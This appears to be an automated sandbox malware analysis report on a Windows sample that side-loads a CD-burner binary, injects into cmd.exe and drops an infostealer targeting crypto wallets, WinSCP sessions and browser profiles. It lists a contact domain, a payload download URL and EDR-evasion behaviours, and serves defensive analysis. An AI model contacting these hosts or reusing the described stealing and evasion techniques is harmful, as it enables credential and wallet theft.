Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryInformationProcess: Direct from: 0x7FF66924D346Jump to behavior
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtCreateThreadEx: Direct from: 0x7FF6691B3FB0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtDelayExecution: Direct from: 0x7FF66934012AJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtMapViewOfSection: Direct from: 0x7FF66923F4BEJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtSetInformationThread: Direct from: 0x7FF6693D09CEJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF669374A40Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtClose: Direct from: 0x7FF669258C3E
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF669254A3DJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryValueKey: Direct from: 0x7FF6692763B7Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryInformationProcess: Direct from: 0x7FF6693148B3Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF66932B955Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtReadVirtualMemory: Direct from: 0x7FF66931A520Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtDelayExecution: Direct from: 0x7FF66933EC2DJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6692A319EJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtClose: Direct from: 0x7FF6692A5F50
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF669248AA9Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtCreateThreadEx: Direct from: 0x7FF6691B41BFJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6691C399FJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF669318ADDJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtSetInformationProcess: Direct from: 0x7FF669314987Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6691BC4D3Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtSetInformationProcess: Direct from: 0x7FF669259496Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6691C6355Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtReadFile: Direct from: 0x14011D832Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtDeviceIoControlFile: Direct from: 0x7FF6692D7976Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtCreateFile: Direct from: 0x7FF6693C5B77Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF66931A9B6Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtCreateFile: Direct from: 0x14011D7A4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF66931CCA7Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtDelayExecution: Direct from: 0x7FF669349C9CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF66931E7C5Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6691BE868Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6693C6D98Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeNtSetInformationThread: Direct from: 0x6CDC7B9CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6692D5700Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryInformationProcess: Direct from: 0x7FF6693233DFJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x140120A3CJump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read writeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: NULL target: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe protection: read writeJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read writeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: NULL target: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe protection: read writeJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeSection loaded: NULL target: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe protection: readonly
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe base: 14011BC08Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe base: 398010Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe base: 14011BC08Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe base: 33B010Jump to behavior
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeCode function: 1_2_5BB3EE0F _LogonUser_@24,SetLastError,newMultiByteFromWideChar,newMultiByteFromWideChar,newMultiByteFromWideChar,LogonUserA,GlobalFree,GlobalFree,GlobalFree,1_2_5BB3EE0F
Source: C:\Users\user\Desktop\w3245.exeProcess created: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe "C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe" -burn.clean.room="C:\Users\user\Desktop\w3245.exe" -burn.filehandle.attached=540 -burn.filehandle.self=528 Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeJump to behavior
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_00801719 InitializeSecurityDescriptor,GetLastError,CreateWellKnownSid,CreateWellKnownSid,GetLastError,CreateWellKnownSid,GetLastError,CreateWellKnownSid,GetLastError,CreateWellKnownSid,GetLastError,CreateWellKnownSid,GetLastError,SetEntriesInAclA,SetSecurityDescriptorOwner,GetLastError,SetSecurityDescriptorGroup,GetLastError,SetSecurityDescriptorDacl,GetLastError,CoInitializeSecurity,LocalFree,0_2_00801719
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_00803A5F AllocateAndInitializeSid,CheckTokenMembership,0_2_00803A5F
Source: RescueCDBurner.exe, 00000002.00000002.1714490543.000000000A01A000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1775182556.0000000009B8C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2045312559.0000000004C42000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: )[%d] Shell_TrayWndTrayNotifyWnd
Source: RescueCDBurner.exe, 00000002.00000002.1716390154.000000006C49E000.00000002.00000001.01000000.0000000E.sdmpBinary or memory string: nBlChangeWindowMessageFilterChangeWindowMessageFilterExTaskbarCreatedToolbarWindow32SysPagerTrayNotifyWndShell_TrayWndShell_NotifyIconGetRect
Source: RescueCDBurner.exe, 00000003.00000002.1776972727.000000006B68E000.00000002.00000001.01000000.00000015.sdmpBinary or memory string: nakChangeWindowMessageFilterChangeWindowMessageFilterExTaskbarCreatedToolbarWindow32SysPagerTrayNotifyWndShell_TrayWndShell_NotifyIconGetRect
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_007EEC07 cpuid 0_2_007EEC07
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeCode function: _GetLocaleInfo_@16,SetLastError,newMultiByteFromWideCharSize,GetLocaleInfoA,MultiByteToWideChar,GlobalFree,1_2_5BB32D1A
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exeCode function: GetLocaleInfoW,strcmp,strcmp,GetLocaleInfoW,atol,GetACP,2_2_6BD873B4
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,2_2_6BDFF356
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,2_2_6BDFF2EF
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exeCode function: GetLocaleInfoA,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,_errno,2_2_6BD852E4
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exeCode function: _getptd,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_itoa_s,__fassign,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,strcpy_s,__invoke_watson,2_2_6BD87270
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exeCode function: GetLocaleInfoW,free,_calloc_crt,strncpy_s,GetLocaleInfoW,GetLocaleInfoW,_calloc_crt,GetLocaleInfoW,GetLastError,_calloc_crt,free,free,__invoke_watson,2_2_6BD8767A
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,_freea_s,malloc,2_2_6BD8750C
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_007D4EDF ConvertStringSecurityDescriptorToSecurityDescriptorW,GetLastError,CreateNamedPipeW,GetLastError,CreateNamedPipeW,GetLastError,CloseHandle,LocalFree,0_2_007D4EDF
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_007C6037 GetSystemTime,GetDateFormatW,GetLastError,GetLastError,GetDateFormatW,GetLastError,0_2_007C6037
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_007C61DF GetUserNameW,GetLastError,0_2_007C61DF
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_0080887B GetTimeZoneInformation,SystemTimeToTzSpecificLocalTime,0_2_0080887B
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_007C5195 GetModuleHandleW,CoInitializeEx,GetVersionExW,GetLastError,CoUninitialize,0_2_007C5195
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information

barindex
Found many strings related to Crypto-Wallets (likely being stolen)
Source: LocalCtrl_alpha_v3.exe, 0000000A.00000003.2233114676.0000000000546000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: Electrum
Source: LocalCtrl_alpha_v3.exe, 0000000A.00000003.2167001213.0000000000546000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb
Source: LocalCtrl_alpha_v3.exe, 0000000A.00000003.2233114676.0000000000546000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: wallets\Exodus\exodus.wallet
Source: LocalCtrl_alpha_v3.exe, 0000000A.00000003.2233114676.0000000000546000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: Exodus\exodus.wallet
Source: LocalCtrl_alpha_v3.exe, 0000000A.00000003.2167001213.0000000000546000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: r\??\C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets#
Tries to harvest and steal Bitcoin Wallet information
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeKey opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-QtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeKey opened: HKEY_CURRENT_USER\Software\monero-project\monero-coreJump to behavior
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\SessionsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2 OverrideJump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\ProfilesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-releaseJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\z6bny8rn.defaultJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\DefaultJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeDirectory queried: C:\Users\user\Documents\WKXEWIOTXIJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeDirectory queried: C:\Users\user\Documents\SQRKHNBNYNJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeDirectory queried: C:\Users\user\Documents\JSDNGYCOWYJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire Infrastructure2
Valid Accounts		4
Native API		11
DLL Side-Loading		1
Abuse Elevation Control Mechanism		1
Deobfuscate/Decode Files or Information		1
OS Credential Dumping		12
System Time Discovery		Remote Services11
Archive Collected Data		1
Ingress Tool Transfer		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts3
Command and Scripting Interpreter		1
Create Account		11
DLL Side-Loading		1
Abuse Elevation Control Mechanism		1
Credentials in Registry		1
Account Discovery		Remote Desktop Protocol21
Data from Local System		21
Encrypted Channel		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts2
Service Execution		2
Valid Accounts		2
Valid Accounts		4
Obfuscated Files or Information		Security Account Manager1
System Service Discovery		SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCron4
Windows Service		21
Access Token Manipulation		1
Software Packing		NTDS14
File and Directory Discovery		Distributed Component Object ModelInput Capture14
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchd1
Registry Run Keys / Startup Folder		4
Windows Service		11
DLL Side-Loading		LSA Secrets147
System Information Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts213
Process Injection		1
File Deletion		Cached Domain Credentials121
Security Software Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
Registry Run Keys / Startup Folder		21
Masquerading		DCSync2
Process Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
Valid Accounts		Proc Filesystem11
Virtualization/Sandbox Evasion		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
Virtualization/Sandbox Evasion		/etc/passwd and /etc/shadow1
System Owner/User Discovery		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron21
Access Token Manipulation		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd213
Process Injection		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
Indicator Removal		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1584991 Sample: w3245.exe Startdate: 06/01/2025 Architecture: WINDOWS Score: 80 92 fg.microsoft.map.fastly.net 2->92 94 bamarelakij.site 2->94 110 AI detected suspicious sample 2->110 13 w3245.exe 3 2->13         started        16 RescueCDBurner.exe 1 2->16         started        19 msedge.exe 2->19         started        22 2 other processes 2->22 signatures3 process4 dnsIp5 90 C:\Windows\Temp\...\w3245.exe, PE32 13->90 dropped 24 w3245.exe 17 13->24         started        108 Maps a DLL or memory area into another process 16->108 27 cmd.exe 2 16->27         started        96 192.168.2.4, 138, 443, 49723 unknown unknown 19->96 98 239.255.255.250 unknown Reserved 19->98 30 msedge.exe 19->30         started        33 msedge.exe 19->33         started        35 msedge.exe 19->35         started        41 3 other processes 19->41 37 msedge.exe 22->37         started        39 msedge.exe 22->39         started        file6 signatures7 process8 dnsIp9 72 C:\Windows\Temp\...\RescueCDBurner.exe, PE32 24->72 dropped 74 C:\Windows\Temp\...\msvcr100.dll, PE32 24->74 dropped 76 C:\Windows\Temp\...\msvcp100.dll, PE32 24->76 dropped 80 6 other files (none is malicious) 24->80 dropped 43 RescueCDBurner.exe 11 24->43         started        78 C:\Users\user\AppData\Local\...\lshbkgxootar, PE32+ 27->78 dropped 126 Writes to foreign memory regions 27->126 128 Maps a DLL or memory area into another process 27->128 47 conhost.exe 27->47         started        49 LocalCtrl_alpha_v3.exe 27->49         started        102 20.110.205.119, 443, 49856 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 30->102 104 20.189.173.4, 443, 49847, 49878 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 30->104 106 16 other IPs or domains 30->106 file10 signatures11 process12 file13 82 C:\Users\user\AppData\...\RescueCDBurner.exe, PE32 43->82 dropped 84 C:\Users\user\AppData\...\msvcr100.dll, PE32 43->84 dropped 86 C:\Users\user\AppData\...\msvcp100.dll, PE32 43->86 dropped 88 5 other files (none is malicious) 43->88 dropped 138 Switches to a custom stack to bypass stack traces 43->138 140 Found direct / indirect Syscall (likely to bypass EDR) 43->140 51 RescueCDBurner.exe 1 43->51         started        signatures14 process15 signatures16 112 Maps a DLL or memory area into another process 51->112 114 Switches to a custom stack to bypass stack traces 51->114 116 Found direct / indirect Syscall (likely to bypass EDR) 51->116 54 cmd.exe 5 51->54         started        process17 file18 68 C:\Users\user\...\LocalCtrl_alpha_v3.exe, PE32+ 54->68 dropped 70 C:\Users\user\AppData\Local\Temp\xbsvw, PE32+ 54->70 dropped 118 Writes to foreign memory regions 54->118 120 Found hidden mapped module (file has been removed from disk) 54->120 122 Maps a DLL or memory area into another process 54->122 124 Switches to a custom stack to bypass stack traces 54->124 58 LocalCtrl_alpha_v3.exe 54->58         started        62 conhost.exe 54->62         started        signatures19 process20 dnsIp21 100 bamarelakij.site 104.21.80.52, 443, 49739, 49740 CLOUDFLARENETUS United States 58->100 130 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 58->130 132 Found many strings related to Crypto-Wallets (likely being stolen) 58->132 134 Tries to harvest and steal browser information (history, passwords, etc) 58->134 136 2 other signatures 58->136 64 msedge.exe 16 58->64         started        signatures22 process23 process24 66 msedge.exe 64->66         started       

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
w3245.exe3%ReversingLabs

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe0%ReversingLabs
C:\Users\user\AppData\Roaming\TaskManage\QtCore4.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\TaskManage\QtGui4.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\TaskManage\QtNetwork4.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\TaskManage\QtXml4.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe3%ReversingLabs
C:\Users\user\AppData\Roaming\TaskManage\StarBurn.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\TaskManage\msvcp100.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\TaskManage\msvcr100.dll0%ReversingLabs
C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\QtCore4.dll0%ReversingLabs
C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\QtGui4.dll0%ReversingLabs
C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\QtNetwork4.dll0%ReversingLabs
C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\QtXml4.dll0%ReversingLabs
C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exe3%ReversingLabs
C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\StarBurn.dll0%ReversingLabs
C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\msvcp100.dll0%ReversingLabs
C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\msvcr100.dll0%ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://www.reneelab.cc/0%Avira URL Cloudsafe
http://www.reneelab.it/0%Avira URL Cloudsafe
http://www.reneelab.biz/0%Avira URL Cloudsafe
https://downloads.reneelab.com/download_api.php0%Avira URL Cloudsafe
http://www.reneelab.fr/0%Avira URL Cloudsafe
http://support.reneelab.com/anonymous_requests/new0%Avira URL Cloudsafe
https://downloads.reneelab.com/passnow/passnow_cnhttps://downloads.reneelab.com.cn/passnow/passnow_x0%Avira URL Cloudsafe
http://support.reneelab.com/anonymous_requests/newstore/buy-renee-passnowentrare-nel-bios.htmlItalia0%Avira URL Cloudsafe
http://bug.reneelab.com0%Avira URL Cloudsafe
https://downloads.reneelab.com.cn/download_api.php0%Avira URL Cloudsafe
http://www.reneelab.de/0%Avira URL Cloudsafe
http://www.reneelab.ru/0%Avira URL Cloudsafe
http://grub4dos.chenall.net/e/%u)0%Avira URL Cloudsafe
http://b.chenall.net/menu.lst0%Avira URL Cloudsafe
https://bamarelakij.site/han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D0%Avira URL Cloudsafe
http://isecure-a.reneelab.com/webapi.php?code=0%Avira URL Cloudsafe
https://downloads.reneelab.com/download_api.phphttps://downloads.reneelab.com.cn/download_api.php?ac0%Avira URL Cloudsafe
http://www.phreedom.org/md5)41UTN-USERFirst-Hardware72:03:21:05:c5:0c:08:57:3d:8e:a5:30:4e:fe:e8:b0D0%Avira URL Cloudsafe
http://www.softwareok.de0%Avira URL Cloudsafe
http://www.reneelab.es/0%Avira URL Cloudsafe
http://www.reneelab.de/product-land-237.htmlhttp://support.reneelab.com/anonymous_requests/newstore/0%Avira URL Cloudsafe
http://schemas.micus0%Avira URL Cloudsafe
http://www.trialpay.com/productpage/?c=3016dc6&tid=6rpipbo0%Avira URL Cloudsafe
https://www.reneelab.com0%Avira URL Cloudsafe
http://bugreports.qt-project.org/0%Avira URL Cloudsafe
http://www.reneelab.com/product-land-188.htmlhttp://support.reneelab.com/anonymous_requests/newstore0%Avira URL Cloudsafe
http://www.reneelab.com.cn/0%Avira URL Cloudsafe
http://trolltech.com/xml/features/report-whitespace-only-CharDatahttp://xml.org/sax/features/namespa0%Avira URL Cloudsafe
http://www.reneelab.pl/0%Avira URL Cloudsafe
https://avrupabaski.com/wp-content/upgrade/wsn.exe0%Avira URL Cloudsafe
http://www.reneelab.es/product-land-280.htmlhttp://support.reneelab.com/anonymous_requests/newstore/0%Avira URL Cloudsafe
https://www.reneelab.comwww.reneelab.comhttp://https://00%Avira URL Cloudsafe
http://www.reneelab.kr/0%Avira URL Cloudsafe
http://bug.reneelab.com/psw_report.phpLicenseCodePSW_RENEELB_WINx86_20201003User0%Avira URL Cloudsafe
https://downloads.reneelab.com/passnow/passnow_0%Avira URL Cloudsafe
